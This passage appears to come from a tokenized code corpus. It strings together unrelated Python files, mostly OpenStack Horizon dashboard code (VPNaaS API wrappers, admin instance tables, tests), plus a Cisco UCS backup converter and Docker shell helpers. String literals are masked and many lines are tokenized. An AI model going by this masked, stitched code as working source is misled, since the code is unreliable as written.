open ( results_file , "<STR_LIT:w>" ) as f : <EOL> print ( "<STR_LIT>" , results_file ) <EOL> cPickle . dump ( D_model_results , f , protocol = - <NUM_LIT:1> ) <EOL> D_results . append ( D_model_results ) <EOL> all_results . append ( D_results ) <EOL> for D in [ <NUM_LIT:20> , <NUM_LIT:30> , <NUM_LIT> ] : <EOL> results_file = os . path . join ( results_dir , "<STR_LIT>" % ( "<STR_LIT>" , D ) ) <EOL> print ( "<STR_LIT>" , results_file ) <EOL> with gzip . open ( results_file , "<STR_LIT:r>" ) as f : <EOL> D_model_results = cPickle . load ( f ) <EOL> all_results [ <NUM_LIT:0> ] . append ( D_model_results ) <EOL> res_index = <NUM_LIT:0> <EOL> plot_pred_log_likelihood ( all_results [ res_index ] , <EOL> models , <EOL> results_dir , <EOL> outname = "<STR_LIT>" % Ds [ res_index ] ) <EOL> plot_pred_ll_vs_D ( all_results , Ds , Xtrain , Xtest , results_dir , models ) <EOL> plt . show ( ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( np . array ( words ) [ np . where ( Xfilt [ docs ] [ <NUM_LIT:0> ] ) [ <NUM_LIT:1> ] ] ) <EOL> compute_singular_vectors ( all_results [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] . samples [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , np . array ( words ) ) </s>
<s> from crypto import SHA256d , ConvergentEncryption , encrypt_key </s>
<s> """<STR_LIT>""" <EOL> from __future__ import unicode_literals , absolute_import <EOL> from __future__ import print_function , division <EOL> from topology . platforms . shell import PExpectShell , PExpectBashShell <EOL> class DockerExecMixin ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , container , command , * args , ** kwargs ) : <EOL> self . _container = container <EOL> self . _command = command <EOL> super ( DockerExecMixin , self ) . __init__ ( * args , ** kwargs ) <EOL> def _get_connect_command ( self ) : <EOL> return '<STR_LIT>' . format ( <EOL> self . _container , self . _command <EOL> ) <EOL> class DockerShell ( DockerExecMixin , PExpectShell ) : <EOL> """<STR_LIT>""" <EOL> class DockerBashShell ( DockerExecMixin , PExpectBashShell ) : <EOL> """<STR_LIT>""" <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' ] </s>
<s> __author__ = '<STR_LIT>' </s>
<s> import logging <EOL> log = logging . getLogger ( __name__ ) <EOL> import os <EOL> import re <EOL> import xml . dom <EOL> import xml . dom . minidom <EOL> from Constants import * <EOL> from UcsHandle import _AffirmativeList <EOL> from UcsBase import * <EOL> from MoMeta import _VersionMeta , _ManagedObjectMeta <EOL> def GetElementChildNodes ( node ) : <EOL> childList = [ childNode for childNode in node . childNodes if childNode . nodeType == childNode . ELEMENT_NODE ] <EOL> return childList <EOL> def GetPropName ( prop ) : <EOL> newProp = re . sub ( '<STR_LIT>' , '<STR_LIT:_>' , re . sub ( '<STR_LIT>' , '<STR_LIT>' , re . sub ( '<STR_LIT>' , '<STR_LIT:_>' , re . sub ( '<STR_LIT>' , '<STR_LIT>' , prop ) ) ) ) . upper ( ) <EOL> return newProp <EOL> def CreatePythonPropertyMap ( propertyMap ) : <EOL> s = "<STR_LIT:{>" <EOL> for key , value in propertyMap . iteritems ( ) : <EOL> s = s + key + "<STR_LIT::>" + value + "<STR_LIT:U+002CU+0020>" <EOL> if s != "<STR_LIT:{>" : <EOL> s = s [ : - <NUM_LIT:2> ] <EOL> return ( s + "<STR_LIT:}>" ) <EOL> def MakeRn ( classNode ) : <EOL> classId = classNode . localName <EOL> propMoMeta = UcsUtils . GetUcsPropertyMeta ( UcsUtils . WordU ( classId ) , "<STR_LIT:Meta>" ) <EOL> rnPattern = propMoMeta . rn <EOL> for prop in re . findall ( "<STR_LIT>" , rnPattern ) : <EOL> prop = UcsUtils . WordL ( prop ) <EOL> if classNode . hasAttribute ( prop ) : <EOL> if ( classNode . getAttribute ( prop ) != None ) : <EOL> rnPattern = re . sub ( '<STR_LIT>' % UcsUtils . WordU ( prop ) , '<STR_LIT:%s>' % classNode . getAttribute ( prop ) , rnPattern ) <EOL> else : <EOL> raise Exception ( '<STR_LIT>' % prop ) <EOL> else : <EOL> raise Exception ( '<STR_LIT>' % prop ) <EOL> return rnPattern <EOL> def IsAddorSet ( classNode ) : <EOL> AddSetFlag = None <EOL> classId = classNode . localName <EOL> propMoMeta = UcsUtils . GetUcsPropertyMeta ( UcsUtils . WordU ( classId ) , "<STR_LIT:Meta>" ) <EOL> verbs = propMoMeta . 
verbs <EOL> if verbs : <EOL> if "<STR_LIT>" in verbs or "<STR_LIT>" in verbs : <EOL> AddSetFlag = "<STR_LIT>" <EOL> elif "<STR_LIT>" in verbs : <EOL> AddSetFlag = "<STR_LIT>" <EOL> else : <EOL> return None <EOL> else : <EOL> AddSetFlag = "<STR_LIT>" <EOL> return AddSetFlag <EOL> def FormGetCmdlet ( classNode , inMo , tagName ) : <EOL> classId = classNode . localName <EOL> propertyMap = { } <EOL> rn = MakeRn ( classNode ) <EOL> dn = None <EOL> if UcsUtils . FindClassIdInMoMetaIgnoreCase ( classId ) == None : <EOL> gmoFlag = True <EOL> print ( "<STR_LIT>" % UcsUtils . WordU ( classId ) ) <EOL> else : <EOL> gmoFlag = False <EOL> if not gmoFlag : <EOL> peerClassId = UcsUtils . WordU ( classId ) <EOL> peerClassIdStr = peerClassId + "<STR_LIT>" <EOL> dnStr = '<STR_LIT>' <EOL> else : <EOL> peerClassId = "<STR_LIT>" <EOL> peerClassIdStr = '<STR_LIT:">' + ( classId ) + '<STR_LIT:">' <EOL> for attr , val in classNode . attributes . items ( ) : <EOL> name = attr <EOL> value = '<STR_LIT:">' + val + '<STR_LIT:">' <EOL> paramNameToUse = name <EOL> if paramNameToUse is not None : <EOL> if not gmoFlag and UcsUtils . GetUcsPropertyMeta ( peerClassId , UcsUtils . WordU ( paramNameToUse ) ) is not None : <EOL> paramNameToUse = peerClassId + '<STR_LIT:.>' + GetPropName ( paramNameToUse ) <EOL> else : <EOL> paramNameToUse = '<STR_LIT:">' + paramNameToUse + '<STR_LIT:">' <EOL> propertyMap [ paramNameToUse ] = value <EOL> if classNode . parentNode . localName == "<STR_LIT>" : <EOL> if rn : <EOL> dn = rn <EOL> cmdlet = "<STR_LIT>" % ( tagName , inMo , peerClassIdStr , peerClassId , dnStr , dn ) <EOL> else : <EOL> cmdlet = "<STR_LIT>" % ( tagName , inMo , peerClassIdStr , CreatePythonPropertyMap ( propertyMap ) ) <EOL> return cmdlet <EOL> def FormAddCmdlet ( classNode , inMo , tagName ) : <EOL> classId = classNode . localName <EOL> propertyMap = { } <EOL> if UcsUtils . FindClassIdInMoMetaIgnoreCase ( classId ) == None : <EOL> gmoFlag = True <EOL> print ( "<STR_LIT>" % UcsUtils . 
WordU ( classId ) ) <EOL> else : <EOL> gmoFlag = False <EOL> if not gmoFlag : <EOL> peerClassId = UcsUtils . WordU ( classId ) <EOL> peerClassIdStr = peerClassId + "<STR_LIT>" <EOL> dnStr = '<STR_LIT>' <EOL> else : <EOL> peerClassId = "<STR_LIT>" <EOL> peerClassIdStr = '<STR_LIT:">' + ( classId ) + '<STR_LIT:">' <EOL> for attr , val in classNode . attributes . items ( ) : <EOL> name = attr <EOL> value = '<STR_LIT:">' + val + '<STR_LIT:">' <EOL> paramNameToUse = name <EOL> if paramNameToUse is not None : <EOL> if not gmoFlag and UcsUtils . GetUcsPropertyMeta ( peerClassId , UcsUtils . WordU ( paramNameToUse ) ) is not None : <EOL> paramNameToUse = peerClassId + '<STR_LIT:.>' + GetPropName ( paramNameToUse ) <EOL> else : <EOL> paramNameToUse = '<STR_LIT:">' + paramNameToUse + '<STR_LIT:">' <EOL> propertyMap [ paramNameToUse ] = value <EOL> cmdlet = "<STR_LIT>" % ( tagName , inMo , peerClassIdStr , CreatePythonPropertyMap ( propertyMap ) ) <EOL> return cmdlet <EOL> def GenSubCmdlet ( classNode , inMo , cmdlet , tagName ) : <EOL> if UcsUtils . IsValidClassId ( UcsUtils . WordU ( classNode . localName ) ) : <EOL> if IsAddorSet ( classNode ) == "<STR_LIT>" : <EOL> tempCmdlet = FormAddCmdlet ( classNode , inMo , tagName ) <EOL> else : <EOL> tempCmdlet = FormGetCmdlet ( classNode , inMo , tagName ) <EOL> else : <EOL> tempCmdlet = FormAddCmdlet ( classNode , inMo , tagName ) <EOL> cmdlet += tempCmdlet <EOL> inMo = tagName <EOL> childList = GetElementChildNodes ( classNode ) <EOL> callCount = <NUM_LIT:1> <EOL> moPatternToIgnore = re . compile ( r'<STR_LIT>' , re . IGNORECASE ) <EOL> for child in childList : <EOL> if moPatternToIgnore . search ( child . localName ) : <EOL> WriteUcsWarning ( '<STR_LIT>' % child . localName ) <EOL> continue <EOL> if UcsUtils . IsValidClassId ( UcsUtils . WordU ( child . localName ) ) : <EOL> if IsAddorSet ( child ) is None or IsAddorSet ( child ) == "<STR_LIT>" : <EOL> WriteUcsWarning ( '<STR_LIT>' % child . 
localName ) <EOL> continue <EOL> tagNameNew = tagName + "<STR_LIT:_>" + str ( callCount ) <EOL> cmdlet = GenSubCmdlet ( child , inMo , cmdlet , tagNameNew ) <EOL> callCount += <NUM_LIT:1> <EOL> return cmdlet <EOL> def GenCmdlet ( topNode ) : <EOL> moPatternToIgnore = re . compile ( r'<STR_LIT>' , re . IGNORECASE ) <EOL> if topNode . localName == "<STR_LIT>" : <EOL> cmdlet = "<STR_LIT>" <EOL> for child in GetElementChildNodes ( topNode ) : <EOL> if UcsUtils . IsValidClassId ( UcsUtils . WordU ( child . localName ) ) : <EOL> if moPatternToIgnore . search ( child . localName ) : <EOL> WriteUcsWarning ( '<STR_LIT>' % child . localName ) <EOL> continue <EOL> if IsAddorSet ( child ) is None or IsAddorSet ( child ) == "<STR_LIT>" : <EOL> WriteUcsWarning ( '<STR_LIT>' % child . localName ) <EOL> continue <EOL> subCmdlet = "<STR_LIT>" <EOL> parentGetCmd = FormGetCmdlet ( child , "<STR_LIT:None>" , "<STR_LIT>" ) <EOL> if child . hasChildNodes ( ) and len ( GetElementChildNodes ( child ) ) > <NUM_LIT:0> : <EOL> for subChild in GetElementChildNodes ( child ) : <EOL> if moPatternToIgnore . search ( subChild . localName ) : <EOL> WriteUcsWarning ( '<STR_LIT>' % subChild . localName ) <EOL> continue <EOL> if UcsUtils . IsValidClassId ( UcsUtils . WordU ( subChild . localName ) ) : <EOL> if IsAddorSet ( subChild ) is None or IsAddorSet ( subChild ) == "<STR_LIT>" : <EOL> WriteUcsWarning ( '<STR_LIT>' % subChild . localName ) <EOL> continue <EOL> subCmdlet += "<STR_LIT>" <EOL> subCmdlet += GenSubCmdlet ( subChild , "<STR_LIT>" , parentGetCmd , "<STR_LIT>" ) <EOL> subCmdlet += "<STR_LIT>" <EOL> cmdlet += subCmdlet <EOL> cmdlet += "<STR_LIT>" <EOL> return cmdlet <EOL> def ConvertFromBackup ( path , dumpToFile = False , dumpFilePath = None ) : <EOL> if not path : <EOL> WriteUcsWarning ( "<STR_LIT>" ) <EOL> return None <EOL> if not os . path . exists ( path ) : <EOL> WriteUcsWarning ( "<STR_LIT>" ) <EOL> return None <EOL> doc = xml . dom . minidom . parse ( path ) <EOL> topNode = doc . 
documentElement <EOL> if dumpToFile in _AffirmativeList : <EOL> if dumpFilePath : <EOL> finalOutput = GenCmdlet ( topNode ) <EOL> print "<STR_LIT>" + dumpFilePath + "<STR_LIT>" <EOL> outFile = open ( dumpFilePath , '<STR_LIT:w>' ) <EOL> outFile . write ( finalOutput ) <EOL> outFile . close ( ) <EOL> else : <EOL> print "<STR_LIT>" <EOL> return None <EOL> else : <EOL> finalOutput = GenCmdlet ( topNode ) <EOL> print finalOutput </s>
<s> """<STR_LIT>""" <EOL> Horizon = None <EOL> try : <EOL> from horizon . base import Dashboard <EOL> from horizon . base import Horizon <EOL> from horizon . base import Panel <EOL> from horizon . base import PanelGroup <EOL> except ImportError : <EOL> import warnings <EOL> def simple_warn ( message , category , filename , lineno , file = None , line = None ) : <EOL> return '<STR_LIT>' % ( category . __name__ , message ) <EOL> msg = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> warnings . formatwarning = simple_warn <EOL> warnings . warn ( msg , Warning ) <EOL> if Horizon : <EOL> register = Horizon . register <EOL> unregister = Horizon . unregister <EOL> get_absolute_url = Horizon . get_absolute_url <EOL> get_user_home = Horizon . get_user_home <EOL> get_dashboard = Horizon . get_dashboard <EOL> get_default_dashboard = Horizon . get_default_dashboard <EOL> get_dashboards = Horizon . get_dashboards <EOL> urls = Horizon . _lazy_urls <EOL> __all__ = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] </s>
<s> from horizon . tabs . base import Tab <EOL> from horizon . tabs . base import TabGroup <EOL> from horizon . tabs . base import TableTab <EOL> from horizon . tabs . views import TabbedTableView <EOL> from horizon . tabs . views import TabView </s>
<s> import iso8601 <EOL> from django . template . defaultfilters import register <EOL> from django . template . defaultfilters import timesince <EOL> from django . utils . safestring import mark_safe <EOL> from django . utils import timezone <EOL> @ register . filter <EOL> def replace_underscores ( string ) : <EOL> return string . replace ( "<STR_LIT:_>" , "<STR_LIT:U+0020>" ) <EOL> @ register . filter <EOL> def parse_isotime ( timestr , default = None ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return iso8601 . parse_date ( timestr ) <EOL> except ( iso8601 . ParseError , TypeError ) : <EOL> return default or '<STR_LIT>' <EOL> @ register . filter <EOL> def timesince_sortable ( dt ) : <EOL> delta = timezone . now ( ) - dt <EOL> seconds = delta . seconds + ( delta . days * <NUM_LIT> * <NUM_LIT> ) <EOL> return mark_safe ( "<STR_LIT>" % <EOL> ( seconds , timesince ( dt ) ) ) </s>
from __future__ import absolute_import

from openstack_dashboard.api import neutron

neutronclient = neutron.neutronclient


class IKEPolicy(neutron.NeutronAPIDictWrapper):
    """Dict wrapper for a neutron VPNaaS IKE policy resource."""

    def __init__(self, apiresource):
        super(IKEPolicy, self).__init__(apiresource)


class IPSecPolicy(neutron.NeutronAPIDictWrapper):
    """Dict wrapper for a neutron VPNaaS IPSec policy resource."""

    def __init__(self, apiresource):
        super(IPSecPolicy, self).__init__(apiresource)


class IPSecSiteConnection(neutron.NeutronAPIDictWrapper):
    """Dict wrapper for a neutron VPNaaS IPSec site connection resource."""

    def __init__(self, apiresource):
        super(IPSecSiteConnection, self).__init__(apiresource)

    class AttributeDict(dict):
        # Dict whose keys are also readable/writable as attributes.
        def __getattr__(self, attr):
            return self[attr]

        def __setattr__(self, attr, value):
            self[attr] = value

    def readable(self, request):
        """Return a display-friendly AttributeDict for this connection.

        Each referenced resource (IKE policy, IPSec policy, VPN service)
        is resolved to its name; on any lookup failure the raw ID is
        used for both fields instead.
        """
        cFormatted = {'<STR_LIT:id>': self.id,
                      '<STR_LIT:name>': self.name,
                      '<STR_LIT:description>': self.description,
                      '<STR_LIT:status>': self.status,
                      }
        try:
            cFormatted['<STR_LIT>'] = self.ikepolicy_id
            cFormatted['<STR_LIT>'] = ikepolicy_get(
                request, self.ikepolicy_id).name
        except Exception:
            # Fall back to the bare ID when the policy can't be fetched.
            cFormatted['<STR_LIT>'] = self.ikepolicy_id
            cFormatted['<STR_LIT>'] = self.ikepolicy_id
        try:
            cFormatted['<STR_LIT>'] = self.ipsecpolicy_id
            cFormatted['<STR_LIT>'] = ipsecpolicy_get(
                request, self.ipsecpolicy_id).name
        except Exception:
            cFormatted['<STR_LIT>'] = self.ipsecpolicy_id
            cFormatted['<STR_LIT>'] = self.ipsecpolicy_id
        try:
            cFormatted['<STR_LIT>'] = self.vpnservice_id
            cFormatted['<STR_LIT>'] = vpnservice_get(
                request, self.vpnservice_id).name
        except Exception:
            cFormatted['<STR_LIT>'] = self.vpnservice_id
            cFormatted['<STR_LIT>'] = self.vpnservice_id
        return self.AttributeDict(cFormatted)


class VPNService(neutron.NeutronAPIDictWrapper):
    """Dict wrapper for a neutron VPNaaS service resource."""

    def __init__(self, apiresource):
        super(VPNService, self).__init__(apiresource)

    class AttributeDict(dict):
        # Dict whose keys are also readable/writable as attributes.
        def __getattr__(self, attr):
            return self[attr]

        def __setattr__(self, attr, value):
            self[attr] = value

    def readable(self, request):
        """Return a display-friendly AttributeDict for this service.

        Resolves the subnet to its CIDR and the router to its name,
        falling back to raw IDs when a lookup fails.
        """
        sFormatted = {'<STR_LIT:id>': self.id,
                      '<STR_LIT:name>': self.name,
                      '<STR_LIT:description>': self.description,
                      '<STR_LIT>': self.admin_state_up,
                      '<STR_LIT:status>': self.status,
                      }
        try:
            sFormatted['<STR_LIT>'] = self.subnet_id
            sFormatted['<STR_LIT>'] = neutron.subnet_get(
                request, self.subnet_id).cidr
        except Exception:
            sFormatted['<STR_LIT>'] = self.subnet_id
            sFormatted['<STR_LIT>'] = self.subnet_id
        try:
            sFormatted['<STR_LIT>'] = self.router_id
            sFormatted['<STR_LIT>'] = neutron.router_get(
                request, self.router_id).name
        except Exception:
            sFormatted['<STR_LIT>'] = self.router_id
            sFormatted['<STR_LIT>'] = self.router_id
        return self.AttributeDict(sFormatted)


def vpnservice_create(request, **kwargs):
    """Create a VPN service from the given keyword attributes."""
    body = {'<STR_LIT>':
            {'<STR_LIT>': kwargs['<STR_LIT>'],
             '<STR_LIT:name>': kwargs['<STR_LIT:name>'],
             '<STR_LIT:description>': kwargs['<STR_LIT:description>'],
             '<STR_LIT>': kwargs['<STR_LIT>'],
             '<STR_LIT>': kwargs['<STR_LIT>']}
            }
    vpnservice = neutronclient(request).create_vpnservice(body).get(
        '<STR_LIT>')
    return VPNService(vpnservice)


def vpnservices_get(request, **kwargs):
    vpnservices = neutronclient(request).list_vpnservices().get('<STR_LIT>')
    return [VPNService(v) for v in vpnservices]


def vpnservice_get(request, vpnservice_id):
    vpnservice = neutronclient(request).show_vpnservice(vpnservice_id).get(
        '<STR_LIT>')
    return VPNService(vpnservice)


def vpnservice_update(request, vpnservice_id, **kwargs):
    vpnservice = neutronclient(request).update_vpnservice(
        vpnservice_id, kwargs).get('<STR_LIT>')
    return VPNService(vpnservice)


def vpnservice_delete(request, vpnservice_id):
    neutronclient(request).delete_vpnservice(vpnservice_id)


def ikepolicy_create(request, **kwargs):
    """Create an IKE policy from the given keyword attributes."""
    body = {'<STR_LIT>':
            {'<STR_LIT:name>': kwargs['<STR_LIT:name>'],
             '<STR_LIT:description>': kwargs['<STR_LIT:description>'],
             '<STR_LIT>': kwargs['<STR_LIT>'],
             '<STR_LIT>': kwargs['<STR_LIT>'],
             '<STR_LIT>': kwargs['<STR_LIT>'],
             '<STR_LIT>': kwargs['<STR_LIT>'],
             '<STR_LIT>': kwargs['<STR_LIT>'],
             '<STR_LIT>': kwargs['<STR_LIT>']}
            }
    ikepolicy = neutronclient(request).create_ikepolicy(body).get(
        '<STR_LIT>')
    return IKEPolicy(ikepolicy)


def ikepolicies_get(request, **kwargs):
    ikepolicies = neutronclient(request).list_ikepolicies().get('<STR_LIT>')
    return [IKEPolicy(v) for v in ikepolicies]


def ikepolicy_get(request, ikepolicy_id):
    ikepolicy = neutronclient(request).show_ikepolicy(
        ikepolicy_id).get('<STR_LIT>')
    return IKEPolicy(ikepolicy)


def ikepolicy_update(request, ikepolicy_id, **kwargs):
    ikepolicy = neutronclient(request).update_ikepolicy(
        ikepolicy_id, kwargs).get('<STR_LIT>')
    return IKEPolicy(ikepolicy)


def ikepolicy_delete(request, ikepolicy_id):
    neutronclient(request).delete_ikepolicy(ikepolicy_id)


def ipsecpolicy_create(request, **kwargs):
    """Create an IPSec policy from the given keyword attributes."""
    body = {'<STR_LIT>':
            {'<STR_LIT:name>': kwargs['<STR_LIT:name>'],
             '<STR_LIT:description>': kwargs['<STR_LIT:description>'],
             '<STR_LIT>': kwargs['<STR_LIT>'],
             '<STR_LIT>': kwargs['<STR_LIT>'],
             '<STR_LIT>': kwargs['<STR_LIT>'],
             '<STR_LIT>': kwargs['<STR_LIT>'],
             '<STR_LIT>': kwargs['<STR_LIT>'],
             '<STR_LIT>': kwargs['<STR_LIT>']}
            }
    ipsecpolicy = neutronclient(request).create_ipsecpolicy(body).get(
        '<STR_LIT>')
    return IPSecPolicy(ipsecpolicy)


def ipsecpolicies_get(request, **kwargs):
    ipsecpolicies = neutronclient(request).list_ipsecpolicies().get(
        '<STR_LIT>')
    return [IPSecPolicy(v) for v in ipsecpolicies]


def ipsecpolicy_get(request, ipsecpolicy_id):
    ipsecpolicy = neutronclient(request).show_ipsecpolicy(
        ipsecpolicy_id).get('<STR_LIT>')
    return IPSecPolicy(ipsecpolicy)


def ipsecpolicy_update(request, ipsecpolicy_id, **kwargs):
    ipsecpolicy = neutronclient(request).update_ipsecpolicy(
        ipsecpolicy_id, kwargs).get('<STR_LIT>')
    return IPSecPolicy(ipsecpolicy)


def ipsecpolicy_delete(request, ipsecpolicy_id):
    neutronclient(request).delete_ipsecpolicy(ipsecpolicy_id)


def ipsecsiteconnection_create(request, **kwargs):
    """Create an IPSec site connection from the given keyword attributes."""
    body = {'<STR_LIT>':
            {'<STR_LIT:name>': kwargs['<STR_LIT:name>'],
             '<STR_LIT:description>': kwargs['<STR_LIT:description>'],
             '<STR_LIT>': kwargs['<STR_LIT>'],
             '<STR_LIT>': kwargs['<STR_LIT>'],
             '<STR_LIT>': kwargs['<STR_LIT>'],
             '<STR_LIT>': kwargs['<STR_LIT>'],
             '<STR_LIT>': kwargs['<STR_LIT>'],
             '<STR_LIT>': kwargs['<STR_LIT>'],
             '<STR_LIT>': kwargs['<STR_LIT>'],
             '<STR_LIT>': kwargs['<STR_LIT>'],
             '<STR_LIT>': kwargs['<STR_LIT>'],
             '<STR_LIT>': kwargs['<STR_LIT>'],
             '<STR_LIT>': kwargs['<STR_LIT>']}
            }
    ipsecsiteconnection = neutronclient(request).create_ipsec_site_connection(
        body).get('<STR_LIT>')
    return IPSecSiteConnection(ipsecsiteconnection)


def ipsecsiteconnections_get(request, **kwargs):
    ipsecsiteconnections = neutronclient(
        request).list_ipsec_site_connections().get('<STR_LIT>')
    return [IPSecSiteConnection(v) for v in ipsecsiteconnections]


def ipsecsiteconnection_get(request, ipsecsiteconnection_id):
    ipsecsiteconnection = neutronclient(request).show_ipsec_site_connection(
        ipsecsiteconnection_id).get('<STR_LIT>')
    return IPSecSiteConnection(ipsecsiteconnection)


def ipsecsiteconnection_update(request, ipsecsiteconnection_id, **kwargs):
    ipsecsiteconnection = neutronclient(request).update_ipsec_site_connection(
        ipsecsiteconnection_id, kwargs).get('<STR_LIT>')
    return IPSecSiteConnection(ipsecsiteconnection)


def ipsecsiteconnection_delete(request, ipsecsiteconnection_id):
    neutronclient(request).delete_ipsec_site_connection(ipsecsiteconnection_id)
# URL names and view templates for the Groups admin panel.
# NOTE(review): literal values are masked placeholders in this corpus;
# the constant names and assignment order are preserved verbatim.
GROUPS_INDEX_URL = '<STR_LIT>'
GROUPS_INDEX_VIEW_TEMPLATE = '<STR_LIT>'
GROUPS_CREATE_URL = '<STR_LIT>'
GROUPS_CREATE_VIEW_TEMPLATE = '<STR_LIT>'
GROUPS_UPDATE_URL = '<STR_LIT>'
GROUPS_UPDATE_VIEW_TEMPLATE = '<STR_LIT>'
GROUPS_MANAGE_URL = '<STR_LIT>'
GROUPS_MANAGE_VIEW_TEMPLATE = '<STR_LIT>'
GROUPS_ADD_MEMBER_URL = '<STR_LIT>'
GROUPS_ADD_MEMBER_VIEW_TEMPLATE = '<STR_LIT>'
GROUPS_ADD_MEMBER_AJAX_VIEW_TEMPLATE = '<STR_LIT>'
from django.template.defaultfilters import timesince
from django.template.defaultfilters import title
from django.utils.translation import ugettext_lazy as _

from horizon import tables
from horizon.utils import filters

from openstack_dashboard import api
from openstack_dashboard.dashboards.project.instances \
    import tables as project_tables


class AdminEditInstance(project_tables.EditInstance):
    """Edit action reusing the project-level form with an admin URL."""
    url = "<STR_LIT>"


class MigrateInstance(tables.BatchAction):
    """Batch action that live-migrates the selected instances."""
    name = "<STR_LIT>"
    action_present = _("<STR_LIT>")
    action_past = _("<STR_LIT>")
    data_type_singular = _("<STR_LIT>")
    data_type_plural = _("<STR_LIT>")
    classes = ("<STR_LIT>", "<STR_LIT>")

    def allowed(self, request, instance):
        # Migration is offered for active (or one other masked status)
        # instances that are not currently being deleted.
        return ((instance.status in project_tables.ACTIVE_STATES
                 or instance.status == '<STR_LIT>')
                and not project_tables.is_deleting(instance))

    def action(self, request, obj_id):
        api.nova.server_migrate(request, obj_id)


class AdminUpdateRow(project_tables.UpdateRow):
    """Row updater that also resolves the owning tenant's name."""

    def get_data(self, request, instance_id):
        instance = super(AdminUpdateRow, self).get_data(request, instance_id)
        tenant = api.keystone.tenant_get(request,
                                         instance.tenant_id,
                                         admin=True)
        instance.tenant_name = getattr(tenant, "<STR_LIT:name>", None)
        return instance


class AdminInstanceFilterAction(tables.FilterAction):

    def filter(self, table, instances, filter_string):
        """Case-insensitive substring match on the instance name."""
        q = filter_string.lower()
        return [instance for instance in instances
                if q in instance.name.lower()]


class AdminInstancesTable(tables.DataTable):
    TASK_STATUS_CHOICES = (
        (None, True),
        ("<STR_LIT:none>", True)
    )
    STATUS_CHOICES = (
        ("<STR_LIT>", True),
        ("<STR_LIT>", True),
        ("<STR_LIT>", True),
        ("<STR_LIT>", True),
        ("<STR_LIT:error>", False),
    )
    tenant = tables.Column("<STR_LIT>", verbose_name=_("<STR_LIT>"))
    host = tables.Column("<STR_LIT>",
                         verbose_name=_("<STR_LIT>"),
                         classes=('<STR_LIT>',))
    name = tables.Column("<STR_LIT:name>",
                         link=("<STR_LIT>"),
                         verbose_name=_("<STR_LIT:Name>"))
    image_name = tables.Column("<STR_LIT>",
                               verbose_name=_("<STR_LIT>"))
    ip = tables.Column(project_tables.get_ips,
                       verbose_name=_("<STR_LIT>"),
                       attrs={'<STR_LIT>': "<STR_LIT>"})
    size = tables.Column(project_tables.get_size,
                         verbose_name=_("<STR_LIT>"),
                         classes=('<STR_LIT>',),
                         attrs={'<STR_LIT>': '<STR_LIT:size>'})
    status = tables.Column("<STR_LIT:status>",
                           filters=(title, filters.replace_underscores),
                           verbose_name=_("<STR_LIT>"),
                           status=True,
                           status_choices=STATUS_CHOICES,
                           display_choices=
                           project_tables.STATUS_DISPLAY_CHOICES)
    task = tables.Column("<STR_LIT>",
                         verbose_name=_("<STR_LIT>"),
                         filters=(title, filters.replace_underscores),
                         status=True,
                         status_choices=TASK_STATUS_CHOICES,
                         display_choices=project_tables.TASK_DISPLAY_CHOICES)
    state = tables.Column(project_tables.get_power_state,
                          filters=(title, filters.replace_underscores),
                          verbose_name=_("<STR_LIT>"))
    created = tables.Column("<STR_LIT>",
                            verbose_name=_("<STR_LIT>"),
                            filters=(filters.parse_isotime, timesince))

    class Meta:
        name = "<STR_LIT>"
        verbose_name = _("<STR_LIT>")
        status_columns = ["<STR_LIT:status>", "<STR_LIT>"]
        table_actions = (project_tables.TerminateInstance,
                         AdminInstanceFilterAction)
        row_class = AdminUpdateRow
        row_actions = (project_tables.ConfirmResize,
                       project_tables.RevertResize,
                       AdminEditInstance,
                       project_tables.ConsoleLink,
                       project_tables.LogLink,
                       project_tables.CreateSnapshot,
                       project_tables.TogglePause,
                       project_tables.ToggleSuspend,
                       MigrateInstance,
                       project_tables.SoftRebootInstance,
                       project_tables.RebootInstance,
                       project_tables.TerminateInstance)
<s> import datetime <EOL> from django . core . urlresolvers import reverse <EOL> from django import http <EOL> from django . utils import timezone <EOL> from mox import IsA <EOL> from horizon . templatetags import sizeformat <EOL> from openstack_dashboard import api <EOL> from openstack_dashboard . test import helpers as test <EOL> from openstack_dashboard import usage <EOL> INDEX_URL = reverse ( '<STR_LIT>' ) <EOL> class UsageViewTests ( test . BaseAdminViewTests ) : <EOL> @ test . create_stubs ( { api . nova : ( '<STR_LIT>' , '<STR_LIT>' , ) , <EOL> api . keystone : ( '<STR_LIT>' , ) , <EOL> api . neutron : ( '<STR_LIT>' , ) , <EOL> api . network : ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) } ) <EOL> def test_usage ( self ) : <EOL> now = timezone . now ( ) <EOL> usage_obj = api . nova . NovaUsage ( self . usages . first ( ) ) <EOL> api . keystone . tenant_list ( IsA ( http . HttpRequest ) ) . AndReturn ( [ self . tenants . list ( ) , False ] ) <EOL> api . nova . usage_list ( IsA ( http . HttpRequest ) , <EOL> datetime . datetime ( now . year , <EOL> now . month , <EOL> now . day , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) , <EOL> datetime . datetime ( now . year , <EOL> now . month , <EOL> now . day , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> ) ) . AndReturn ( [ usage_obj ] ) <EOL> api . nova . tenant_absolute_limits ( IsA ( http . HttpRequest ) ) . AndReturn ( self . limits [ '<STR_LIT>' ] ) <EOL> api . neutron . is_extension_supported ( IsA ( http . HttpRequest ) , <EOL> '<STR_LIT>' ) . AndReturn ( True ) <EOL> api . network . tenant_floating_ip_list ( IsA ( http . HttpRequest ) ) . AndReturn ( self . floating_ips . list ( ) ) <EOL> api . network . security_group_list ( IsA ( http . HttpRequest ) ) . AndReturn ( self . q_secgroups . list ( ) ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . get ( reverse ( '<STR_LIT>' ) ) <EOL> self . assertTemplateUsed ( res , '<STR_LIT>' ) <EOL> self . assertTrue ( isinstance ( res . 
